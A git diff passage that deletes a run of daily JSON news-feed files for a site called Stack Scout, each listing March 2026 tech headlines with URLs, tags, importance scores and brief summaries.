"cli_tool" - ], - "importance": 0.7, - "date": "2026-03-18T17:46:25.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Pgit – A Git-like CLI backed by PostgreSQL", - "url": "https://oseifert.ch/blog/building-pgit", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-17T06:11:17.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Hacker News archive (47M+ items, 11.6GB) as Parquet, updated every 5m", - "url": "https://huggingface.co/datasets/open-index/hacker-news", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.7, - "date": "2026-03-14T17:12:03.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Measuring progress toward AGI: A cognitive framework", - "url": "https://blog.google/innovation-and-ai/models-and-research/google-deepmind/measuring-agi-cognitive-framework/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.61, - "date": "2026-03-18T11:44:44.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-19.json b/data/news-feed-2026-03-19.json deleted file mode 100644 index d4b456d..0000000 --- a/data/news-feed-2026-03-19.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.270Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-19", - "article_count": 5, - "archived_story_count": 98, - "articles": [ - { - "title": "Multiverse Computing pushes its compressed AI models into the mainstream", - "url": "https://techcrunch.com/2026/03/19/multiverse-computing-pushes-its-compressed-ai-models-into-the-mainstream/", - "source": "TechCrunch AI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-03-19T08:00:00.000Z", - "summary": "After compressing models from major AI labs, including OpenAI, Meta, DeepSeek, and Mistral AI, Multiverse Computing has launched both an app that showcases the capabilities of its compressed models and an API that makes them more widely available.", - "category": "ai_tools" - }, - { - "title": "DoorDash launches a new ‘Tasks’ app that pays couriers to submit videos to train AI", - "url": "https://techcrunch.com/2026/03/19/doordash-launches-a-new-tasks-app-that-pays-couriers-to-submit-videos-to-train-ai/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9099999999999999, - "date": "2026-03-19T16:14:00.000Z", - "summary": "Delivery couriers will be able to earn money by completing activities like filming everyday tasks or recording themselves speaking in another language.", - "category": "ai_tools" - }, - { - "title": "Hyper-optimized reverse geocoding API", - "url": "https://github.com/traccar/traccar-geocoder", - "source": "Hacker News", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.7599999999999999, - "date": "2026-03-19T14:38:51.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Framework doesn't matter", - "url": "https://cemrehancavdar.com/2026/02/19/your-framework-may-not-matter/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7599999999999999, - "date": "2026-03-14T22:14:26.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Cook: A simple CLI for orchestrating Claude Code", - "url": "https://rjcorwin.github.io/cook/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.6499999999999999, - "date": "2026-03-19T02:20:34.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-20.json b/data/news-feed-2026-03-20.json deleted file mode 100644 index c4f0a1c..0000000 --- a/data/news-feed-2026-03-20.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.431Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-20", - "article_count": 6, - "archived_story_count": 82, - "articles": [ - { - "title": "OpenCode – Open source AI coding agent", - "url": "https://opencode.ai/", - "source": "Hacker News", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 0.76, - "date": "2026-03-20T21:03:52.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "My AI Agent ‘Cofounder’ Conquered LinkedIn. Then It Got Banned", - "url": "https://www.wired.com/story/linkedin-invited-my-ai-cofounder-to-give-a-corporate-talk-then-banned-it/", - "source": "Wired AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-03-20T10:00:00.000Z", - "summary": "When social media is constantly pushing people to use AI, why not let AI agents participate?", - "category": "ai_tools" - }, - { - "title": "Trump’s AI framework targets state laws, shifts child safety burden to parents", - "url": "https://techcrunch.com/2026/03/20/trumps-ai-framework-targets-state-laws-shifts-child-safety-burden-to-parents/", - "source": "TechCrunch AI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.9099999999999999, - "date": "2026-03-20T16:14:04.000Z", - "summary": "Trump’s AI framework pushes federal preemption of state laws, emphasizes innovation, and shifts responsibility for child safety toward parents while laying out lighter-touch rules for tech companies.", - "category": "ai_tools" - }, - { - "title": "Show HN: We built a terminal-only Bluesky / AT Proto client written in Fortran", - "url": "https://github.com/FormerLab/fortransky", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-20T22:06:51.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Sonar – A tiny CLI to see and kill whatever's running on localhost", - "url": "https://github.com/RasKrebs/sonar", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-20T09:59:56.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: An open-source safety net for home hemodialysis", - "url": "https://safehemo.com/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-17T00:48:15.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-21.json b/data/news-feed-2026-03-21.json deleted file mode 100644 index c72119d..0000000 --- a/data/news-feed-2026-03-21.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.597Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-21", - "article_count": 7, - "archived_story_count": 80, - "articles": [ - { - "title": "Apple Announces New Mac Sales Record Following MacBook Neo Launch", - "url": "https://www.macrumors.com/2026/03/20/apple-shares-mac-sales-achievement/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9, - "date": "2026-03-21T15:59:42.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Mamba-3", - "url": "https://www.together.ai/blog/mamba-3", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.87, - "date": "2026-03-17T00:00:00.000Z", - "summary": "Meet Mamba-3: the SSM built for inference. Faster than Transformers at decode, stronger than Mamba-2, and open-source from day one.", - "category": "tech_general" - }, - { - "title": "Iran launched unsuccessful attack on UK's Diego Garcia", - "url": "https://www.bbc.com/news/articles/c5yljdgwppzo", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.84, - "date": "2026-03-21T14:54:38.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Termcraft – terminal-first 2D sandbox survival in Rust", - "url": "https://github.com/pagel-s/termcraft", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-21T18:42:38.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Atuin v18.13 – better search, a PTY proxy, and AI for your shell", - "url": "https://blog.atuin.sh/atuin-v18-13/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-21T10:35:20.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "purl: a curl-esque CLI for making HTTP requests that require payment", - "url": "https://www.purl.dev/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-21T02:09:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Floci – A free, open-source local AWS emulator", - "url": "https://github.com/hectorvent/floci", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-21T21:49:15.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-22.json b/data/news-feed-2026-03-22.json deleted file mode 100644 index 0aac51b..0000000 --- a/data/news-feed-2026-03-22.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.763Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-22", - "article_count": 7, - "archived_story_count": 88, - "articles": [ - { - "title": "Elon Musk unveils chip manufacturing plans for SpaceX and Tesla", - "url": "https://techcrunch.com/2026/03/22/elon-musk-unveils-chip-manufacturing-plans-for-spacex-and-tesla/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-22T16:20:00.000Z", - "summary": "Elon Musk recently outlined ambitious plans for a chip-building collaboration Tesla and SpaceX — but he has a history of overpromising.", - "category": "ai_tools" - }, - { - "title": "Show HN: A Markdown file that turns your AI agent into an autonomous researcher", - "url": "https://github.com/krzysztofdudek/ResearcherSkill", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.9199999999999999, - "date": "2026-03-22T18:21:48.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "HopTab–free,open source macOS app switcher and tiler that replaces Cmd+Tab", - "url": "https://www.royalbhati.com/hoptab", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.7599999999999999, - "date": "2026-03-22T06:23:59.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Training Center for Maneuvering on Manned Model Ships", - "url": "https://www.portrevel.com/", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.7599999999999999, - "date": "2026-03-20T12:04:49.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "$ teebot.dev – from terminal to tee in 6 seconds", - "url": "https://teebot.dev", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-22T12:22:50.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "How to Attract AI Bots to Your Open Source Project", - "url": "https://nesbitt.io/2026/03/21/how-to-attract-ai-bots-to-your-open-source-project.html", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-21T20:58:01.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Node.js worker threads are problematic, but they work great for us", - "url": "https://www.inngest.com/blog/node-worker-threads", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-18T16:51:51.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-23.json b/data/news-feed-2026-03-23.json deleted file mode 100644 index ad4a6fb..0000000 --- a/data/news-feed-2026-03-23.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.984Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-23", - "article_count": 3, - "archived_story_count": 82, - "articles": [ - { - "title": "The Download: animal welfare gets AGI-pilled, and the White House unveils its AI policy", - "url": "https://www.technologyreview.com/2026/03/23/1134509/the-download-animal-welfare-agi-pilled-white-house-unveils-ai-policy/", - "source": "MIT Tech Review AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.8800000000000001, - "date": "2026-03-23T12:17:33.000Z", - "summary": "This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. The Bay Area’s animal welfare movement wants to recruit AI  In early February, animal welfare advocates and AI researchers arrived in stocking feet at Mox, a scrappy, shoes-free coworking space in…", - "category": "ai_research" - }, - { - "title": "Show HN: Agent Kernel – Three Markdown files that make any AI agent stateful", - "url": "https://github.com/oguzbilgic/agent-kernel", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.78, - "date": "2026-03-23T07:06:42.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "The way CTRL-C in Postgres CLI cancels queries is incredibly hack-y", - "url": "https://neon.com/blog/ctrl-c-in-psql-gives-me-the-heebie-jeebies", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-20T13:21:51.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-24.json b/data/news-feed-2026-03-24.json deleted file mode 100644 index 4770e19..0000000 --- a/data/news-feed-2026-03-24.json +++ /dev/null @@ -1,145 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.177Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-24", - "article_count": 9, - "archived_story_count": 101, - "articles": [ - { - "title": "Google TV’s new Gemini features keep fans updated on sports teams and more", - "url": "https://techcrunch.com/2026/03/24/google-tv-new-gemini-features-keep-fans-updated-on-sports-teams-deep-dives-visual-answers/", - "source": "TechCrunch AI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-03-24T19:12:11.000Z", - "summary": "Three Gemini-powered features are coming to your Google TV. This includes visual responses, deep dives, and sports briefs.", - "category": "ai_tools" - }, - { - "title": "OpenAI adds open source tools to help developers build for teen safety", - "url": "https://techcrunch.com/2026/03/24/openai-adds-open-source-tools-to-help-developers-build-for-teen-safety/", - "source": "TechCrunch AI", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.94, - "date": "2026-03-24T18:41:34.000Z", - "summary": "Rather than working from scratch to figure out how to make AI safer for teens, developers can use these policies to fortify what they build.", - "category": "ai_tools" - }, - { - "title": "Sunsetting the Techempower Framework Benchmarks", - "url": "https://github.com/TechEmpower/FrameworkBenchmarks/issues/10932", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.82, - "date": "2026-03-24T01:54:03.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Self-propagating malware poisons open source software and wipes Iran-based machines", - "url": "https://arstechnica.com/security/2026/03/self-propagating-malware-poisons-open-source-software-and-wipes-iran-based-machines/", - "source": "Ars Technica AI", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.7599999999999999, - "date": "2026-03-24T12:38:09.000Z", - "summary": "Development houses: It's time to check your networks for infections.", - "category": "tech_general" - }, - { - "title": "Qite.js – Frontend framework for people who hate React and love HTML", - "url": "https://qitejs.qount25.dev", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7599999999999999, - "date": "2026-03-19T13:49:12.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Nanobrew: The fastest macOS package manager compatible with brew", - "url": "https://nanobrew.trilok.ai/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-24T11:40:21.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "A retro terminal music player inspired by Winamp", - "url": "https://github.com/bjarneo/cliamp", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-23T20:42:22.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Gridland: make terminal apps that also run in the browser", - "url": "https://www.gridland.io/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-24T16:57:47.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Log File Viewer for the Terminal", - "url": "https://lnav.org/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-24T05:32:53.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-25.json b/data/news-feed-2026-03-25.json deleted file mode 100644 index d98f4ec..0000000 --- a/data/news-feed-2026-03-25.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.352Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-25", - "article_count": 7, - "archived_story_count": 95, - "articles": [ - { - "title": "Google launches Lyria 3 Pro music generation model", - "url": "https://techcrunch.com/2026/03/25/google-launches-lyria-3-pro-music-generation-model/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-25T16:37:43.000Z", - "summary": "Google is launching Lyria 3 Pro, an upgraded music model that generates longer, more customizable tracks, as it expands AI music tools across Gemini, enterprise products, and other services.", - "category": "ai_tools" - }, - { - "title": "Meta launches new initiative to support entrepreneurship, drive AI adoption", - "url": "https://techcrunch.com/2026/03/25/meta-launches-new-initiative-to-support-entrepreneurship-drive-ai-adoption/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-25T14:45:20.000Z", - "summary": "Meta CEO Mark Zuckerberg said in a memo to staff that small businesses have always been a big part of the company's business model, and that while tens of millions of entrepreneurs already use its platforms to grow and connect with customers, the company wants to do more in the space.", - "category": "ai_tools" - }, - { - "title": "Google unveils TurboQuant, a new AI memory compression algorithm — and yes, the internet is calling it ‘Pied Piper’", - "url": "https://techcrunch.com/2026/03/25/google-turboquant-ai-memory-compression-silicon-valley-pied-piper/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.77, - "date": "2026-03-25T20:38:45.000Z", - "summary": "Google’s TurboQuant has the internet joking about Pied Piper from HBO's \"Silicon Valley.\" The compression algorithm promises to shrink AI’s “working memory” by up to 6x, but it’s still just a lab experiment for now.", - "category": "ai_tools" - }, - { - "title": "Building a coding agent in Swift from scratch", - "url": "https://github.com/ivan-magda/swift-claude-code", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.7, - "date": "2026-03-25T10:45:40.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: DuckDB community extension for prefiltered HNSW using ACORN-1", - "url": "https://github.com/cigrainger/duckdb-hnsw-acorn", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-25T03:28:04.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Rendering complex scripts in terminal and OSC 66", - "url": "https://thottingal.in/blog/2026/03/22/complex-scripts-in-terminal/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-22T09:31:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Open source isn't a tip jar – it's time to charge for access", - "url": "https://www.theregister.com/2026/03/25/open_source_bill_opinion/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-25T11:59:36.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-26.json b/data/news-feed-2026-03-26.json deleted file mode 100644 index 9ea7028..0000000 --- a/data/news-feed-2026-03-26.json +++ /dev/null @@ -1,119 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.591Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-26", - "article_count": 7, - "archived_story_count": 95, - "articles": [ - { - "title": "Cohere launches an open source voice model specifically for transcription", - "url": "https://techcrunch.com/2026/03/26/cohere-launches-an-open-source-voice-model-specifically-for-transcription/", - "source": "TechCrunch AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-03-26T13:30:00.000Z", - "summary": "Relatively light at just 2 billion parameters, the model is meant for use with consumer-grade GPUs for those who want to self-host it. It currently supports 14 languages.", - "category": "ai_tools" - }, - { - "title": "Mistral releases a new open source model for speech generation", - "url": "https://techcrunch.com/2026/03/26/mistral-releases-a-new-open-source-model-for-speech-generation/", - "source": "TechCrunch AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-03-26T11:30:00.000Z", - "summary": "The model, which lets enterprises build voice agents for sales and customer engagement, puts Mistral in direct competition with the likes of ElevenLabs, Deepgram, and OpenAI.", - "category": "ai_tools" - }, - { - "title": "Intel Announces Arc Pro B70 and Arc Pro B65 GPUs", - "url": "https://www.techpowerup.com/347703/intel-announces-arc-pro-b70-and-arc-pro-b65-gpus-maxes-out-xe2-battlemage-architecture", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9199999999999999, - "date": "2026-03-26T14:36:04.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: I put an AI agent on a $7/month VPS with IRC as its transport layer", - "url": "https://georgelarson.me/writing/2026-03-23-nullclaw-doorman/", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.78, - "date": "2026-03-26T22:41:25.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Relay – The open-source Claude Cowork for OpenClaw", - "url": "https://github.com/SeventeenLabs/relay", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.71, - "date": "2026-03-26T10:23:12.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Stripe Projects: Provision and manage services from the CLI", - "url": "https://projects.dev/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-26T16:00:57.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Shell Tricks That Make Life Easier (and Save Your Sanity)", - "url": "https://blog.hofstede.it/shell-tricks-that-actually-make-life-easier-and-save-your-sanity/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-26T00:28:38.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-27.json b/data/news-feed-2026-03-27.json deleted file mode 100644 index f1338e9..0000000 --- a/data/news-feed-2026-03-27.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.771Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-27", - "article_count": 5, - "archived_story_count": 86, - "articles": [ - { - "title": "Nashville library launches Memory Lab for digitizing home movies", - "url": "https://www.axios.com/local/nashville/2026/03/16/nashville-library-digitize-home-movies", - "source": "Hacker News", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 0.84, - "date": "2026-03-24T04:22:15.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Open-Source Animal Crossing–Style UI for Claude Code Agents", - "url": "https://github.com/outworked/outworked/releases/tag/v0.3.0", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.7699999999999999, - "date": "2026-03-27T17:25:05.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Telnyx package compromised on PyPI", - "url": "https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-27T18:13:57.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Telnyx package compromised on PyPI", - "url": "https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-27T08:57:02.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Minimalist library to generate SVG views of scientific data", - "url": "https://github.com/alefore/mini_svg/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-23T17:54:51.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-28.json b/data/news-feed-2026-03-28.json deleted file mode 100644 index aa285c8..0000000 --- a/data/news-feed-2026-03-28.json +++ /dev/null @@ -1,70 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.984Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-28", - "article_count": 4, - "archived_story_count": 67, - "articles": [ - { - "title": "Arm releases first in-house chip, with Meta as debut customer", - "url": "https://www.cnbc.com/2026/03/24/arm-launches-its-own-cpu-with-meta-as-first-customer.html", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9199999999999999, - "date": "2026-03-24T23:34:06.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Improving personal tax filing with Claude CLI and Obsidian", - "url": "https://www.mrafayaleem.com/blog/improving-personal-tax-filing-with-claude-obsidian", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.73, - "date": "2026-03-28T18:21:52.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Improved Git Diffs with Delta, Fzf and a Little Shell Scripting", - "url": "https://nickjanetakis.com/blog/awesome-git-diffs-with-delta-fzf-and-a-little-shell-scripting", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-24T15:02:38.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenCiv1 – open-source rewrite of Civ1", - "url": "https://github.com/rajko-horvat/OpenCiv1", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-28T18:22:45.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-29.json b/data/news-feed-2026-03-29.json deleted file mode 100644 index b79c584..0000000 --- a/data/news-feed-2026-03-29.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "generated": "2026-06-05T00:44:31.207Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-29", - "article_count": 3, - "archived_story_count": 57, - "articles": [ - { - "title": "Figma's MCP Update Reflects a Larger Industry Shift", - "url": "https://metedata.substack.com/p/a-small-figma-update-and-a-big-signal", - "source": "Hacker News", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 0.8200000000000001, - "date": "2026-03-29T15:46:26.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenYak – An open-source Cowork that runs any model and owns your filesystem", - "url": "https://github.com/openyak/desktop", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.82, - "date": "2026-03-29T04:26:13.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Pretext: TypeScript library for multiline text measurement and layout", - "url": "https://github.com/chenglou/pretext", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-28T16:52:45.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-30.json b/data/news-feed-2026-03-30.json deleted file mode 100644 index 5e30e14..0000000 --- a/data/news-feed-2026-03-30.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "generated": "2026-06-05T00:44:31.348Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-30", - "article_count": 2, - "archived_story_count": 75, - "articles": [ - { - "title": "There are more AI health tools than ever—but how well do they work?", - "url": "https://www.technologyreview.com/2026/03/30/1134795/there-are-more-ai-health-tools-than-ever-but-how-well-do-they-work/", - "source": "MIT Tech Review AI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.9099999999999999, - "date": "2026-03-30T16:00:00.000Z", - "summary": "Earlier this month, Microsoft launched Copilot Health, a new space within its Copilot app where users will be able to connect their medical records and ask specific questions about their health. A couple of days earlier, Amazon had announced that Health AI, an LLM-based tool previously restricted to members of its One Medical service, would…", - "category": 